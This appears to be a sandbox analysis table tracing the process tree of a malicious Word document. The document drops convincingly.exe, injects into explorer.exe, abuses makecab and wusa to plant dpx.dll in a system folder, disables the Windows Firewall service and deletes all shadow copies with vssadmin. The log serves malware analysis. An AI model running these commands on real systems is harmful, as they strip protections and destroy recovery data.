ID
|
PID
|
Monitor Reason
|
Image Name
|
Command Line
|
Origin ID
|
#1
|
0x85c
|
Analysis Target
|
winword.exe
|
"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE"
|
|
#2
|
0x998
|
Modified File
|
convincingly.exe
|
"C:\Users\hJrD1KOKY DS8lUjv\AppData\Roaming\convincingly.exe"
|
#1
|
#3
|
0x9c4
|
Child Process
|
convincingly.exe
|
"C:\Users\hJrD1KOKY DS8lUjv\AppData\Roaming\convincingly.exe"
|
#2
|
#4
|
0x9d0
|
Child Process
|
explorer.exe
|
C:\Windows\SysWOW64\explorer.exe
|
#3
|
#5
|
0x9d8
|
Child Process
|
cmd.exe
|
cmd.exe /c makecab "C:\Windows\SysWOW64\wusa.exe" "C:\Users\hJrD1KOKY DS8lUjv\AppData\Roaming\cabfile.cab"
|
#4
|
#6
|
0x9f0
|
Child Process
|
makecab.exe
|
makecab "C:\Windows\SysWOW64\wusa.exe" "C:\Users\hJrD1KOKY DS8lUjv\AppData\Roaming\cabfile.cab"
|
#5
|
#7
|
0x9f8
|
Child Process
|
cmd.exe
|
cmd.exe /c c:\windows\system32\wusa "C:\Users\hJrD1KOKY DS8lUjv\AppData\Roaming\cabfile.cab" /extract:"C:\Windows\SysWOW64\drivers"
|
#4
|
#8
|
0xa10
|
Child Process
|
wusa.exe
|
c:\windows\system32\wusa "C:\Users\hJrD1KOKY DS8lUjv\AppData\Roaming\cabfile.cab" /extract:"C:\Windows\SysWOW64\drivers"
|
#7
|
#9
|
0xa20
|
Child Process
|
wusa.exe
|
"C:\windows\system32\wusa.exe" "C:\Users\hJrD1KOKY DS8lUjv\AppData\Roaming\cabfile.cab" /extract:"C:\Windows\SysWOW64\drivers"
|
#7
|
#10
|
0xa98
|
Child Process
|
wusa.exe
|
"C:\Windows\SysWOW64\wusa.exe" "C:\Users\hJrD1KOKY DS8lUjv\AppData\Roaming\cabfile.cab" /extract:"C:\Windows\SysWOW64\drivers"
|
#7
|
#11
|
0xaac
|
Child Process
|
cmd.exe
|
cmd.exe /c makecab "C:\Users\hJrD1KOKY DS8lUjv\AppData\Roaming\dpx.dll" "C:\Users\hJrD1KOKY DS8lUjv\AppData\Roaming\cabfile.cab"
|
#4
|
#12
|
0xac4
|
Child Process
|
makecab.exe
|
makecab "C:\Users\hJrD1KOKY DS8lUjv\AppData\Roaming\dpx.dll" "C:\Users\hJrD1KOKY DS8lUjv\AppData\Roaming\cabfile.cab"
|
#11
|
#13
|
0xacc
|
Child Process
|
cmd.exe
|
cmd.exe /c c:\windows\system32\wusa "C:\Users\hJrD1KOKY DS8lUjv\AppData\Roaming\cabfile.cab" /extract:"C:\Windows\SysWOW64\drivers"
|
#4
|
#14
|
0xae4
|
Child Process
|
wusa.exe
|
c:\windows\system32\wusa "C:\Users\hJrD1KOKY DS8lUjv\AppData\Roaming\cabfile.cab" /extract:"C:\Windows\SysWOW64\drivers"
|
#13
|
#15
|
0xaf4
|
Child Process
|
wusa.exe
|
"C:\windows\system32\wusa.exe" "C:\Users\hJrD1KOKY DS8lUjv\AppData\Roaming\cabfile.cab" /extract:"C:\Windows\SysWOW64\drivers"
|
#13
|
#16
|
0xb28
|
Child Process
|
wusa.exe
|
"C:\Windows\SysWOW64\wusa.exe" "C:\Users\hJrD1KOKY DS8lUjv\AppData\Roaming\cabfile.cab" /extract:"C:\Windows\SysWOW64\drivers"
|
#13
|
#17
|
0xb70
|
Child Process
|
wusa.exe
|
"C:\Windows\SysWOW64\drivers\wusa.exe"
|
#4
|
#18
|
0xb7c
|
Child Process
|
convin~1.exe
|
C:\Users\HJRD1K~1\AppData\Roaming\CONVIN~1.EXE
|
#17
|
#19
|
0xbd0
|
Child Process
|
convin~1.exe
|
C:\Users\HJRD1K~1\AppData\Roaming\CONVIN~1.EXE
|
#18
|
#20
|
0xbd8
|
Child Process
|
explorer.exe
|
C:\Windows\SysWOW64\explorer.exe
|
#19
|
#21
|
0xbe0
|
Child Process
|
cmd.exe
|
cmd.exe /c net stop MpsSvc
|
#20
|
#22
|
0xbe8
|
Child Process
|
cmd.exe
|
cmd.exe /c sc config MpsSvc start= disabled
|
#20
|
#23
|
0x844
|
Child Process
|
net.exe
|
net stop MpsSvc
|
#21
|
#24
|
0x854
|
Child Process
|
sc.exe
|
sc config MpsSvc start= disabled
|
#22
|
#25
|
0x83c
|
Child Process
|
net1.exe
|
C:\Windows\system32\net1 stop MpsSvc
|
#23
|
#26
|
0x834
|
Child Process
|
iexplore.exe
|
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
|
#20
|
#27
|
0x828
|
Child Process
|
vssadmin.exe
|
vssadmin.exe delete shadows /all /quiet
|
#26
|